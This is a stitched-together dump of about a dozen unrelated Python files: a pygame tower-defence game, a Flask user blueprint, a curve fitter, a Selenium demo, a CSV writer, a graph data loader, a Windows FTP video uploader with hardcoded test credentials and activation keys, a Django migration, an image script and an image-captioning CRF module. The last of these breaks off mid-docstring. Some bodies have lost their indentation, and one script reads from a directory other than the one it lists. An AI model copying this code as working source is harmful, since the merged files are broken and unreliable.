    diagram.view()
|
# -*- coding: utf-8 -*-
# Tower / tirs
__author__ = 'Quentin'
from grille import *
from outils import *
# Algorithm
# Each tower manages its own firing rhythm.
# A tower that fires:
#  - finds its target (closest, closest to the exit, ...)
#  - creates a shot and adds it to the list of shots to track.
class Tir():
    """A single projectile fired by a tower at a creature (pygame).

    Globals (BLANC, SCREEN, TABLE_NORMALE_TOUR_*, pygame, math, ...) come
    from the star-imports of grille/outils at the top of the file.
    """
    def __init__(self, bete, vitesse,force, force_coeff,force_ralentire,compte_a_rebour_ralentire, x = 100, y = 100):
        self.x = x # pixel x coordinate
        self.y = y # pixel y coordinate
        self.bete = bete # target creature of the shot
        self.vitesse = vitesse
        self.impact = False # has the shot reached its target?
        # NOTE(review): `force` holds the damage applied on impact but is set
        # from force_coeff, while the tier level comes from `force` -- the two
        # parameter names look swapped relative to the attributes; confirm
        # against the tower code that creates Tir instances.
        self.force = force_coeff # shot strength (life removed from the creature hit)
        self.force_niveau = force
        self.force_ralentire = force_ralentire
        self.compte_a_rebour_ralentire = compte_a_rebour_ralentire
    # ------------------------------------------------
    def affiche(self):
        """Draw the shot: colour encodes speed tier, radius encodes force tier."""
        couleur = BLANC
        if self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]:
            couleur = BLANC
        elif self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]+TABLE_NORMALE_TOUR_VITESSE[1]:
            couleur = JAUNE
        elif self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]+TABLE_NORMALE_TOUR_VITESSE[1]+TABLE_NORMALE_TOUR_VITESSE[2]:
            couleur = ORANGE
        elif self.vitesse == TABLE_NORMALE_TOUR_VITESSE[0]+TABLE_NORMALE_TOUR_VITESSE[1]+TABLE_NORMALE_TOUR_VITESSE[2]+TABLE_NORMALE_TOUR_VITESSE[3]:
            couleur = ROUGE
        tail = 2
        if self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]:
            tail = 1
        elif self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]+TABLE_NORMALE_TOUR_FORCE[1]:
            tail = 2
        elif self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]+TABLE_NORMALE_TOUR_FORCE[1]+TABLE_NORMALE_TOUR_FORCE[2]:
            tail = 3
        elif self.force_niveau == TABLE_NORMALE_TOUR_FORCE[0]+TABLE_NORMALE_TOUR_FORCE[1]+TABLE_NORMALE_TOUR_FORCE[2]+TABLE_NORMALE_TOUR_FORCE[3]:
            tail = 4
        pygame.draw.circle(SCREEN, couleur, [int(self.x), int(self.y)], tail, 0)
        pass
    # ------------------------------------------------
    def deplace(self):
        """Move the shot toward its target; set self.impact when it arrives."""
        # TODO: aim at the creature's centre instead of its top-left pixel.
        dirx = self.bete.x - self.x
        diry = self.bete.y - self.y
        distance = math.sqrt(dirx ** 2 + diry **2)
        # Close enough to cover the remaining distance this tick: impact.
        if distance < self.vitesse:
            self.impact = True
            return
        # Otherwise advance one step along the normalised direction.
        dirx = dirx / distance
        diry = diry / distance
        self.x = int(self.x + dirx * self.vitesse )
        self.y = int(self.y + diry * self.vitesse )
    # ------------------------------------------------
    def traite_impact(self):
        """Apply damage (and possibly a slow effect) to the target creature."""
        # Reduce the creature's life by the shot's force.
        if self.bete.vie > self.force:
            self.bete.vie -= self.force
            # If the creature accepts the slow effect, scale its speed down.
            if self.bete.ralentie(self.compte_a_rebour_ralentire,self.force_ralentire):
                self.bete.vitesse = self.bete.vitesse * self.force_ralentire
        else:
            self.bete.vie=0
from flask import Blueprint, request, render_template, \
flash, g, session, redirect, url_for
from flask.ext.user.signals import user_logged_in, user_registered
from flask_user import current_user, login_required
import app
from app import db
from models import User
mod_user = Blueprint('user', __name__, url_prefix='/user')
@mod_user.route('/dashboard', methods=['GET', 'POST'])
@login_required
def dashboard():
    """User settings dashboard: save first/last name on POST, prefill on GET.

    NOTE(review): UserForm, City and Country are not imported anywhere in
    this file -- as written, this view raises NameError at request time;
    confirm which module they should come from.
    """
    form = UserForm()
    if form.validate_on_submit():
        current_user.first_name = form.first_name.data
        current_user.last_name = form.last_name.data
        db.session.commit()
        flash('Setting saved.')
        # Redirect-after-POST to avoid duplicate submissions.
        return redirect(url_for('.dashboard'))
    # GET (or invalid POST): prefill the form from the logged-in user.
    form.first_name.data = current_user.first_name
    form.last_name.data = current_user.last_name
    form.phone.data = current_user.phone
    form.address.data = current_user.address
    form.city.data = City.get_name_by_id(current_user.city_id)
    form.country_id.data = Country.get_name_by_id(
        current_user.country_id)
    form.zipcode.data = current_user.zipcode
    return render_template("user/dashboard.html", form=form)
@mod_user.route('/update', methods=['POST'])
@login_required
def update_user():
    """Stub endpoint for user updates (Python 2 print statement below).

    NOTE(review): when validation fails this returns None, which Flask
    treats as an error -- probably needs an error response.
    """
    form = UserForm()
    if form.validate_on_submit():
        print form
        return 'hi'
@mod_user.route('/')
def show_users():
    """Render the user index page with every user in the database."""
    everyone = User.query.all()
    return render_template("user/index.html", users=everyone)
@mod_user.route('/profile')
@login_required
def user_profile():
    """Placeholder profile page."""
    response_body = 'hi'
    return response_body
@mod_user.route('/setting')
@login_required
def setting():
    """Placeholder settings page."""
    response_body = 'setting'
    return response_body
# seems the hook doesn't work if placed here
@user_logged_in.connect_via(app)
def _after_login_hook(sender, user, **extra):
    """Log each successful login (Python 2 print below).

    NOTE(review): `app` here is the imported module, not a Flask app
    instance; connect_via normally expects the sender application object,
    which may be why the hook "doesn't work" -- confirm.
    """
    sender.logger.info('user logged in')
    print 'mod_user controller: user logged in'
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sys
from curvefit import *
class multicurvefit(curvefit):
    '''Piecewise fit of a curve in the log-log plane.

    The curve is decomposed into several straight segments; each segment is
    fitted independently over its own x-range and stored as one row of
    ``self.polys`` (columns: coeffs, xmin, xmax).
    '''
    def __init__(self, x=[], y=[]):  # *args, **kwargs):
        # NOTE: the mutable defaults are kept for interface compatibility;
        # they are only read (converted to arrays), never mutated.
        self.x = np.asarray(x)
        self.y = np.asarray(y)
        # Per-instance segment table.  The original kept this as a shared
        # class attribute, which leaked fits between instances.
        self.polys = pd.DataFrame()
    def __getitem__(self, key):
        '''Dict-style access to the raw data: key must be 'x' or 'y'.'''
        if key == 'x':
            return self.x
        elif key == 'y':
            return self.y
        else:
            sys.exit('Not key: %s' % key)
    def add_curve(self, xmin, xmax, poly_order=1, ShowPlot=True, verbose=False):
        '''Add one straight segment to the logarithmic fit between xmin and
        xmax (both endpoints are included in the data selection).
        ShowPlot to check the fit.
        '''
        df = pd.DataFrame()
        df['x'] = self.x
        df['y'] = self.y
        d = df[np.logical_and(df.x >= xmin, df.x <= xmax)]
        c = curvefit(d.x.values, d.y.values)
        c.add_fit(poly_order)  # populates c.coeffs
        ps = pd.Series({'coeffs': c.coeffs, 'xmin': xmin, 'xmax': xmax})
        # DataFrame.append was removed in pandas 2.x; concatenate a
        # one-row frame instead (same resulting table).
        self.polys = pd.concat([self.polys, pd.DataFrame([ps])],
                               ignore_index=True)
    def delete_last_curve(self):
        '''Delete the last saved straight segment.'''
        self.polys = self.polys[:-1]
    def to_json(self, jsonfile):
        '''
        Save the fit data to a json file with columns:
        coeffs, xmin, xmax
        where coeffs are used to build the poly1d objects.
        '''
        self.polys.to_json(jsonfile)
    def read_json(self, jsonfile):
        '''
        Recover fitted data from a json file with columns:
        coeffs, xmin, xmax
        where coeffs are used to build the poly1d objects.
        '''
        self.polys = pd.read_json(jsonfile, dtype=object)
        for i in range(self.polys.shape[0]):
            # .ix was removed from pandas; use positional .iloc instead.
            self.polys.loc[i, 'coeffs'] = np.asarray(self.polys.iloc[i].coeffs)
        self.polys = self.polys.reset_index(drop=True)
    def __call__(self, x, verbose=True):
        '''
        Evaluate the piecewise fit at x (scalar or array-like): pick the
        segment whose [xmin, xmax) range contains each point, build its
        poly1d and evaluate it in log10 space.  Points outside the fitted
        range are clamped to the first/last segment with a warning.
        '''
        xa = np.asarray(x)
        limit = np.array([])
        if not np.asarray(x).shape:
            xa = np.asarray([x])
        for xx in xa:
            wrng = False
            if xx < self.polys.xmin.min():
                wrng = True
                coeffs = self.polys[:1]
            elif xx >= self.polys.xmax.max():
                wrng = True
                coeffs = self.polys[-1:]
            else:
                coeffs = self.polys[np.logical_and(self.polys.xmin <= xx,
                                                   self.polys.xmax > xx)]
            if wrng:
                if verbose:
                    print('WARNING: Out of fitted range:', xx)
            coeffs = coeffs.coeffs.reset_index(drop=True)[0]
            if len(coeffs) > 0:
                p = np.poly1d(coeffs)
                # The fit lives in log10-log10 space: undo the log on output.
                limit = np.append(limit, 10.**(p(np.log10(xx))))
            else:
                sys.exit('ERROR: Out of range')
        if limit.shape[0] == 1:
            limit = limit[0]
        return limit
|
from Include.PytestFrameWorkApproch.BasePkg.DriverClassModule import SelenumDriver
# Demo script: open a child browser window, search in it, then return
# to the parent window and click the Login link.
SDriver=SelenumDriver("firefox")
import time
SDriver.Driver.get("https://learn.letskodeit.com/p/practice")
# Remember the original window so we can switch back later.
ParentHandle=SDriver.Driver.current_window_handle
SDriver.clickElementWithResult('xpath', "//button[@id='openwindow']")
handles=SDriver.Driver.window_handles
for handle in handles:
    # Every handle that is not the parent is the newly opened window.
    if handle != ParentHandle:
        SDriver.Driver.switch_to.window(handle)
        print ("New window handle is " + handle)
        SearchCource, SearchCourceTorF = SDriver.getElementWithResult('xpath', "//input[@id='search-courses']")
        if SearchCourceTorF:
            SearchCource.send_keys("Python")
        time.sleep(6)
        SDriver.Driver.close()
# Back to the original window.
SDriver.Driver.switch_to.window(ParentHandle)
time.sleep(3)
# SDriver.clickElementWithResult('xpath', "//a[@id='opentab']")
SDriver.clickElementWithResult('xpath', "//a[contains(text(), 'Login')]")
|
# coding: utf-8
"""Helper to support writing Unicode CSV files."""
import codecs
import cStringIO
import csv
import six
class UnicodeWriter(object):
    """CSV writer which supports unicode output.
    Lifted from https://docs.python.org/2/library/csv.html
    """
    def __init__(self, stream, dialect=csv.excel, encoding="utf-8", **kwds):
        # Rows are first written UTF-8-encoded into this in-memory buffer,
        # then transcoded to the target encoding (Python 2 csv cannot
        # handle unicode directly).
        self.buffer = cStringIO.StringIO()
        self.writer = csv.writer(self.buffer, dialect=dialect, **kwds)
        self.stream = stream
        self.encoder = codecs.getincrementalencoder(encoding)()
    def writerow(self, row):
        """Write a row, encoding it in the chosen encoding.
        Works by using the built in CSV writer to write utf-8 encoded data to a
        buffer, and then re-encodes that data to the chosen encoding before
        writing it to the given stream.
        """
        def encode_strings(row):
            # Encode text cells to UTF-8 bytes; pass non-strings through.
            for item in row:
                if isinstance(item, six.string_types):
                    yield item.encode("utf-8")
                else:
                    yield item
        self.writer.writerow(list(encode_strings(row)))
        self.stream.write(
            self.encoder.encode(
                self.buffer.getvalue().decode("utf-8")
            )
        )
        # Empty the scratch buffer for the next row.
        # NOTE(review): under Python 3's io.StringIO a seek(0) would also be
        # required here; Python 2 cStringIO behaves as intended.
        self.buffer.truncate(0)
    def writerows(self, rows):
        """Write multiple rows to the CSV file."""
        for row in rows:
            self.writerow(row)
|
from hive.data.transformation.utils import relabel_node_ids, generate_adjacency_matrix, generate_ns
from datetime import datetime
import pandas as pd
import numpy as np
import networkx as nx
import scipy.sparse as sps
import random
import torch
class Compose(object):
    """Load a viewing-log CSV, build a weighted static graph of peers, and
    produce train/val/test edge splits as torch tensors.
    """
    def __init__(self, dataset_path, dataset_file, device, relabel_nodes = False, weight_threshold=1000):
        custom_date_parser = lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S")
        data_pd = pd.read_csv(f"{dataset_path}/{dataset_file}", parse_dates=['viewing_minute'], date_parser=custom_date_parser)
        # Rows with no partner get the sentinel node -1 (removed from the
        # graph below).
        data_pd['partner_node_id'] = data_pd['partner_node_id'].fillna(-1)
        data_pd['partner_node_id'] = data_pd['partner_node_id'].astype('int64')
        data_pd['downloadRate'] = data_pd['downloadRate'].fillna(0)
        # Edge weight: download rate normalised by the threshold, capped at 1.
        data_pd['weight'] = data_pd['downloadRate'].apply(lambda x: x / weight_threshold if x <= weight_threshold else 1)
        data_pd, self.num_nodes = relabel_node_ids(data_pd, relabel_nodes)
        self.data = data_pd[['source_node_id', 'partner_node_id', 'weight']]
        self.static_graph = nx.from_pandas_edgelist(self.data, source='source_node_id', target='partner_node_id', edge_attr=['weight'])
        # Drop the sentinel "no partner" node and all its edges.
        self.static_graph.remove_node(-1)
        self.all_edges = [(edge[0], edge[1], edge[2]['weight']) for edge in self.static_graph.edges(data=True)]
        # Unweighted edge set, used for negative sampling lookups.
        self.edges_no_weights = set()
        for edge in self.static_graph.edges():
            self.edges_no_weights.add((edge[0],edge[1]))
        self.train_adj = np.zeros((self.num_nodes, self.num_nodes))
        self.val_adj = np.zeros((self.num_nodes, self.num_nodes))
        self.test_adj = np.zeros((self.num_nodes, self.num_nodes))
        self.device = device
    def get_features(self, node_features = False):
        """Return identity (one-hot) node features as a dense float tensor."""
        return torch.tensor(sps.identity(self.num_nodes, dtype=np.float32, format='coo').todense(), dtype=torch.float32, device=self.device)
    def split_data(self, train_perc=0.6, val_perc = 0.5, ns=1):
        """Shuffle edges and split into train/val/test, appending *ns*
        negative samples per split; returns the train adjacency (sparse)
        plus (indices, values) tensor pairs for each split.
        """
        random.shuffle(self.all_edges)
        num_train_edges = int(len(self.all_edges) * train_perc)
        # val_perc is the share of the *remaining* edges used for validation.
        num_val_edges = int((len(self.all_edges) - num_train_edges) * val_perc)
        train_edges = self.all_edges[:num_train_edges]
        train_edges.extend(generate_ns(train_edges, self.edges_no_weights, self.num_nodes, ns))
        # print(train_edges)
        train_adj = torch.tensor(generate_adjacency_matrix(train_edges, self.num_nodes), dtype=torch.float32, device=self.device).to_sparse()
        train_edges_indices, train_edges_values = self.__transform_arrays_to_tensor__(train_edges)
        val_edges = self.all_edges[num_train_edges:(num_train_edges + num_val_edges)]
        val_edges.extend(generate_ns(val_edges, self.edges_no_weights, self.num_nodes, ns))
        val_edges_indices, val_edges_values = self.__transform_arrays_to_tensor__(val_edges)
        test_edges = self.all_edges[(num_train_edges + num_val_edges):]
        test_edges.extend(generate_ns(test_edges, self.edges_no_weights, self.num_nodes, ns))
        test_edges_indices,test_edges_values = self.__transform_arrays_to_tensor__(test_edges)
        return train_adj, train_edges_indices, train_edges_values, val_edges_indices, val_edges_values, test_edges_indices, test_edges_values
    def __transform_arrays_to_tensor__(self, edges):
        """Split (src, dst, weight) triples into [src, dst] index tensors and
        a flat weight tensor on the configured device.
        """
        adj_indices = [torch.tensor([edge[0] for edge in edges], requires_grad=False, device=self.device), torch.tensor([edge[1] for edge in edges], requires_grad=False, device=self.device)]
        adj_values = torch.reshape(torch.tensor([edge[2] for edge in edges], dtype=torch.float32 , device=self.device), (-1,))
        return adj_indices, adj_values
|
# -*- coding: utf8 -*-
import os
import time
import string
import random
import socket
import win32api
import win32con
import base64
from ftplib import FTP
userID = ' '
username = 'test'
password = 'test'
host = '192.168.194.6'
path = './media'
remotepath = '/'
client_keys = ['01TW5JKD','02YUW8B3','03W49GHK']
def get_new_name():
    """Build a fresh upload filename: YYYYMMDD + 5 random chars + userID + '.mp4'.

    Uses the module-level `userID` global (set after activation) and the
    Python-2-only `string.letters` constant.  Each call returns a new
    random name.
    """
    now_time = time.strftime("%Y%m%d",time.localtime())
    chars = string.digits + string.letters
    gen_str = ''.join(random.sample(chars,5))
    new_name = now_time + gen_str + userID +'.mp4'
    return(new_name)
def rename_file():
print '\n'
for file in os.listdir(path):
if os.path.isfile(os.path.join(path,file)) == True:
os.rename(os.path.join(path,file),os.path.join(path,get_new_name()))
print '%s ==> %s\n' % (file,get_new_name())
log = open('log.txt','a+')
action = time.strftime('%Y%m%d %H:%M:%S ', time.localtime()) + file +' '+ get_new_name()
log.write(action+'\n')
log.close()
def uploading():
    """Upload every file under `path` to the FTP server, one connection per
    file (Python 2; user-facing strings are Chinese).
    """
    for file in os.listdir(path):
        try:
            f = FTP(host)
            f.login(username,password)
            f.cwd(remotepath)
            fd = open(os.path.join(path,file),'rb')
            print u'正在上传:',
            print file
            f.storbinary('STOR %s' % os.path.basename(file),fd)
            fd.close()
            f.quit()
        # NOTE(review): bare except hides the real failure reason (network,
        # auth, file error) -- only the filename is reported.
        except:
            print '%s' % file
            print u'上传失败!'
    print u'\n视频已全部上传完成!\n'
    print u'按任意键退出!'
    raw_input('')
def upload_file():
    """List files under ./media, ask for confirmation, then rename and
    upload them all (Python 2; user-facing strings are Chinese).
    """
    try:
        dirs = os.listdir('media')
        print '-'* 50
        print u'已在media文件夹下读取到以下文件:'
        print '-'* 50
        for file in dirs:
            print file+'\n'
        print '-'* 50
        print u'是否全部上传(y/n)?'
        ch = raw_input(' ')
        try:
            if (ch == 'y' or ch == 'Y'):
                rename_file()
                uploading()
        # NOTE(review): a failure inside rename/upload is reported here as
        # "upload cancelled", which masks real errors.
        except:
            print u'已取消上传!'
    # The media folder does not exist (or is unreadable).
    except :
        print u'无法读取当前的media文件夹,请先创建media文件夹再将视频文件放入其中!'
        s = os.getcwd()
        print u'当前路径为'+s+'\n\n'
        time.sleep(5)
def list_file():
    """Print the remote FTP directory listing (Python 2).

    NOTE(review): FTP.dir() prints the listing itself and returns None,
    so the following `print files` just prints "None".
    """
    try:
        f = FTP(host)
        f.login(username,password)
        f.cwd(remotepath)
        print '-'* 50
        print u'服务器文件列表:'
        print '-'* 50
        files = f.dir()
        print files
        print '-'* 50
        f.quit()
        print u'\n按任意键退出!'
        raw_input('')
    except:
        print u'服务器文件列表获取失败!'
def read_reg():
    """Return True when the 'ftp_client' activation value exists in the
    Windows registry, False otherwise (any registry error counts as
    "not activated").
    """
    try:
        subkey = 'SOFTWARE\Microsoft\Windows\CurrentVersion'
        key = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE,subkey,0,win32con.KEY_READ)
        # Only the presence of the value matters; the result is discarded.
        string = win32api.RegQueryValueEx(key,'ftp_client')
        return True
    except:
        return False
def add_reg(client_key):
    """Persist the activation key to the registry; return True on success.

    Writing HKLM requires administrator rights -- failure is reported to
    the user (Chinese message) and False is returned.
    """
    print 'client_key = %s' % client_key
    try:
        subkey = 'SOFTWARE\Microsoft\Windows\CurrentVersion'
        key = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE,subkey,0,win32con.KEY_ALL_ACCESS)
        win32api.RegSetValueEx(key,'ftp_client',0,win32con.REG_SZ,client_key)
        return True
    except:
        print u'权限不许可,请以管理员权限运行!'
        return False
def running():
    """Show the main menu and dispatch to upload or listing (Python 2)."""
    print '\n'+'-'*50
    print u' 1.上传视频文件\n 2.服务器文件列表\n'
    ch = raw_input('==> ')
    try:
        if (ch == '1'):
            upload_file()
        elif(ch == '2'):
            list_file()
        else:
            print u'输入错误!\n'
    # NOTE(review): bare except swallows any error from the handlers and
    # reports it as an init failure.
    except:
        print u'初始化失败!'
def get_key():
    """Prompt for an activation key; on success store it in the registry,
    derive the global userID from its first two characters, and enter the
    main menu.
    """
    global userID
    print u'此上传插件尚未激活,请输入激活密钥:'
    client_key = raw_input('>>>')
    if client_key in client_keys:
        if add_reg(client_key):
            print u'此上传插件已激活!\n'
            userID = client_key[:2]
            print userID
            running()
    else:
        print u'激活失败,请输入正确的密钥!'
def login_client():
    """Entry point: run the menu when already activated, otherwise ask for a key."""
    if not read_reg():
        get_key()
        return
    running()
if __name__ == '__main__':
    login_client()
    # Brief pause so the console window stays readable before closing.
    time.sleep(3)
|
# Generated by Django 2.0.5 on 2018-05-18 21:16
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial auto-generated migration: creates the CreateUsr and
    Creating tables.  Auto-generated by Django -- do not hand-edit logic.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='CreateUsr',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('logfld', models.CharField(max_length=40)),
                ('passfld', models.CharField(max_length=40)),
                ('langfld', models.CharField(max_length=3)),
                ('key', models.CharField(max_length=2)),
            ],
        ),
        migrations.CreateModel(
            name='Creating',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('inputfld', models.IntegerField()),
                ('checkbox', models.BooleanField()),
                ('key', models.CharField(max_length=2)),
            ],
        ),
    ]
|
#A simple program to resize the Chars74K dataset to 40x40 images and invert the colours
import os
from PIL import Image, ImageOps
# Work relative to this script's own directory.
os.chdir(os.path.dirname(os.path.realpath(__file__)))
#os.mkdir("Chars74KResized") #Creates a new directory for the files
for i in os.listdir("Chars74KResized/"):
    #os.mkdir("Chars74KResized/"+i)#Creates a new directory for each character
    # NOTE(review): filenames are listed from "Chars74K/<i>" but images are
    # opened from "Chars74KResized/<i>" -- this only works if both trees
    # contain identical filenames; confirm which directory is intended.
    for j in os.listdir("Chars74K/"+i):
        im=Image.open("Chars74KResized/"+i+"/"+j)
        im=ImageOps.invert(im) #Inverts the image
        # NOTE(review): with resize and save commented out, this loop has no
        # effect -- the inverted image is never written anywhere.
        #im=im.resize((40,40)) #Resizes the image
        #im.save("Chars74KResized/"+i+"/"+j)#Saves the image
import logging
from typing import Optional
from pygame import Surface
from pygame import draw as pygame_draw
from base_object import BaseObject
from common import RED
from common import TILE_SIZE
from tile_objects.base_tile_object import BaseTileObject
from tile_objects.units.unit import Unit
logger = logging.getLogger('Tile')
logger.setLevel(10)
class Tile(BaseObject):
    """A single map tile: a drawing surface plus the objects placed on it."""

    _surface = None
    # NOTE(review): the original default was `_objects = list` (the type
    # itself, almost certainly a typo).  __init__ always overwrites it, so a
    # neutral None default is safe and avoids a shared mutable class attr.
    _objects = None

    def __init__(self, objects, surface: Optional[Surface]):
        super().__init__()
        self._objects = objects
        self._surface = surface

    def __str__(self):
        return "Tile has these objects: %s" % str(self._objects)

    def draw(self):
        """Draw every contained object, or a red cross when the tile is empty."""
        if self.surface is not None:
            # Fixed: the original used `len(...) is 0`, an identity comparison
            # with an int literal (SyntaxWarning on CPython >= 3.8).
            if len(self._objects) == 0:
                pygame_draw.line(self.surface, RED, (0, 0),
                                 (TILE_SIZE, TILE_SIZE), 3)
                pygame_draw.line(self.surface, RED, (TILE_SIZE, 0),
                                 (0, TILE_SIZE), 3)
            else:
                for obj in self._objects:
                    if isinstance(obj, BaseTileObject):
                        obj.draw(surface=self._surface)
        else:
            logger.info("No surface set")

    @property
    def surface(self) -> Surface:
        return self._surface

    @surface.setter
    def surface(self, surface):
        self._surface = surface

    @property
    def objects(self) -> list:
        return self._objects

    @objects.setter
    def objects(self, objects):
        self._objects = objects

    def get_unit(self) -> Optional[Unit]:
        """Return the first Unit on this tile, or None."""
        for obj in self._objects:
            if isinstance(obj, Unit):
                return obj
        return None

    def pop_unit(self) -> Optional[Unit]:
        """Remove and return the first Unit on this tile, or None."""
        for index in range(len(self._objects)):
            if isinstance(self._objects[index], Unit):
                return self._objects.pop(index)
        return None
|
#coding=utf-8
# This file contains Att2in2, AdaAtt, AdaAttMO, TopDown model
# AdaAtt is from Knowing When to Look: Adaptive Attention via A Visual Sentinel for Image Captioning
# https://arxiv.org/abs/1612.01887
# AdaAttMO is a modified version with maxout lstm
# Att2in is from Self-critical Sequence Training for Image Captioning
# https://arxiv.org/abs/1612.00563
# In this file we only have Att2in2, which is a slightly different version of att2in,
# in which the img feature embedding and word embedding is the same as what in adaatt.
# TopDown is from Bottom-Up and Top-Down Attention for Image Captioning and VQA
# https://arxiv.org/abs/1707.07998
# However, it may not be identical to the author's architecture.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import misc.utils as utils
from torch.nn.utils.rnn import PackedSequence, pack_padded_sequence, pad_packed_sequence
from .CaptionModel import CaptionModel
import time
global_index = 0
def logsumexp(x, dim=None, keepdim=False):
    """Numerically stable log-sum-exp along *dim*.

    When dim is None the input is flattened first.  Rows whose maximum is
    +/-inf are passed through unchanged to avoid NaNs from inf - inf.
    """
    if dim is None:
        x, dim = x.view(-1), 0
    x_max, _ = torch.max(x, dim, keepdim=True)
    is_infinite = (x_max == float('inf')) | (x_max == float('-inf'))
    stable_sum = torch.log(torch.sum(torch.exp(x - x_max), dim, keepdim=True))
    result = torch.where(is_infinite, x_max, x_max + stable_sum)
    if keepdim:
        return result
    return result.squeeze(dim)
def sort_pack_padded_sequence(input, lengths):
    """Pack *input* after sorting the batch by descending length.

    Returns the PackedSequence plus the inverse permutation needed to
    restore the original batch order later.
    """
    # Sort lengths in descending order; `indices` says where each sorted
    # position came from in the original batch.
    sorted_lengths, indices = torch.sort(lengths, descending=True)
    # batch_first=True: dim 0 of input[indices] is batch_size, dim 1 is
    # seq_length; packing compresses along the time dimension column-wise.
    tmp = pack_padded_sequence(input[indices], sorted_lengths, batch_first=True)
    # Build the inverse permutation: inv_ix[original_pos] -> sorted_pos.
    inv_ix = indices.clone()
    inv_ix[indices] = torch.arange(0,len(indices)).type_as(inv_ix)
    return tmp, inv_ix
def pad_unsort_packed_sequence(input, inv_ix):
    """Pad a PackedSequence back to (batch, seq, ...) and restore the
    original (pre-sort) batch order using the inverse permutation *inv_ix*.
    """
    padded, _ = pad_packed_sequence(input, batch_first=True)
    return padded[inv_ix]
def pack_wrapper(module, att_feats, att_masks):
    """Apply *module* to the valid (unmasked) positions of att_feats.

    When att_masks is given, features are packed by true length so the
    module never sees padding; otherwise the module is applied directly.
    """
    if att_masks is not None:
        # C = feat_size; att_feats: [batch_size, w*h, C], att_masks gives the
        # number of valid positions per sample via its row sums.
        packed, inv_ix = sort_pack_padded_sequence(att_feats, att_masks.data.long().sum(1))
        # `module` here is e.g. BN-fc-relu-dropout-BN mapping to rnn_size;
        # the result is unpacked back to [batch_size, seq, rnn_size] in the
        # original batch order.
        return pad_unsort_packed_sequence(PackedSequence(module(packed[0]), packed[1]), inv_ix)
    else:
        return module(att_feats)
class CRF(nn.Module):
"""Conditional random field.
This module implements a conditional random field [LMP01]_. The forward computation
of this class computes the log likelihood of the given sequence of tags and
emission score tensor. This class also has `~CRF.decode` method which finds
the best tag sequence given an emission score tensor using `Viterbi algorithm`_.
Args:
num_tags: Number of tags.
batch_first: Whether the first dimension corresponds to the size of a minibatch.
Attributes:
start_transitions (`~torch.nn.Parameter`): Start transition score tensor of size
``(num_tags,)``.
end_transitions (`~torch.nn.Parameter`): End transition score tensor of size
``(num_tags,)``.
transitions (`~torch.nn.Parameter`): Transition score tensor of size
``(num_tags, num_tags)``.
.. [LMP01] Lafferty, J., McCallum, A., Pereira, F. (2001).
"Conditional random fields: Probabilistic models for segmenting and
labeling sequence data". *Proc. 18th International Conf. on Machine
Learning*. Morgan Kaufmann. pp. 282–289.
.. _Viterbi algorithm: https://en.wikipedia.org/wiki/Viterbi_algorithm
"""
def __init__(self, num_tags, batch_first):
if num_tags <= 0:
print("num_tags error")
super(CRF, self).__init__()
self.num_tags = num_tags
self.batch_first = batch_first
self.start_transitions = nn.Parameter(torch.empty(num_tags))
self.end_transitions = nn.Parameter(torch.empty(num_tags))
self.transitions = nn.Parameter(torch.empty(num_tags, num_tags))
self.reset_parameters()
def reset_parameters(self):
"""Initialize the transition parameters.
The parameters will be initialized randomly from a uniform distribution
between -0.1 and 0.1.
"""
nn.init.uniform_(self.start_transitions, -0.1, 0.1)
nn.init.uniform_(self.end_transitions, -0.1, 0.1)
nn.init.uniform_(self.transitions, -0.1, 0.1)
    def __repr__(self):
        # NOTE(review): a more conventional repr would include num_tags
        # (e.g. "CRF(num_tags=...)"); kept as-is to avoid changing output.
        return "crf"
def forward(
self,
emissions,
tags,
mask,
reduction = 'sum',
):
"""Compute the conditional log likelihood of a sequence of tags given emission scores.
Args:
emissions (`~torch.Tensor`): Emission score tensor of size
``(seq_length, batch_size, num_tags)`` if ``batch_first`` is ``False``,
``(batch_size, seq_length, num_tags)`` otherwise.
tags (`~torch.LongTensor`): Sequence of tags tensor of size
``(seq_length, batch_size)`` if ``batch_first`` is ``False``,
``(batch_size, seq_length)`` otherwise.
mask (`~torch.ByteTensor`): Mask tensor of size ``(seq_length, batch_size)``
if ``batch_first`` is ``False``, ``(batch_size, seq_length)`` otherwise.
reduction: Specifies the reduction to apply to the output:
``none|sum|mean|token_mean``. ``none``: no reduction will be applied.
``sum``: the output will be summed over batches. ``mean``: the output will be
averaged over batches. ``token_mean``: the output will be averaged over tokens.
Returns:
`~torch.Tensor`: The log likelihood. This will have size ``(batch_size,)`` if
reduction is ``none``, ``()`` otherwise.
"""
# print("emissions", emissions.size())
# print("tags", tags.size())
# print("mask", mask.size())
self._validate(emissions, tags=tags, mask=mask)
if reduction not in ('none', 'sum', 'mean', 'token_mean'):
print('invalid reduction')
if mask is None:
mask = torch.ones_like(tags, dtype=torch.uint8)
if self.batch_first:
emissions = emissions.transpose(0, 1)
tags = tags.transpose(0, 1)
mask = mask.transpose(0, 1)
time1 = time.time()
# shape: (batch_size,)
numerator = self._compute_score(emissions, tags, mask)
time2 = time.time()
print("compute score use time ,", time2 - time1)
# shape: (batch_size,)
denominator = self._compute_normalizer(emissions, mask)
# shape: (batch_size,)
llh = numerator - denominator
if reduction == 'none':
return llh
if reduction == 'sum':
return llh.sum()
if reduction == 'mean':
return llh.mean()
assert reduction == 'token_mean'
return llh.sum() / mask.float().sum()
    def decode(self, emissions,
               mask = None):
        """Find the most likely tag sequence using Viterbi algorithm.
        Args:
            emissions (`~torch.Tensor`): Emission score tensor of size
                ``(seq_length, batch_size, num_tags)`` if ``batch_first`` is ``False``,
                ``(batch_size, seq_length, num_tags)`` otherwise.
            mask (`~torch.ByteTensor`): Mask tensor of size ``(seq_length, batch_size)``
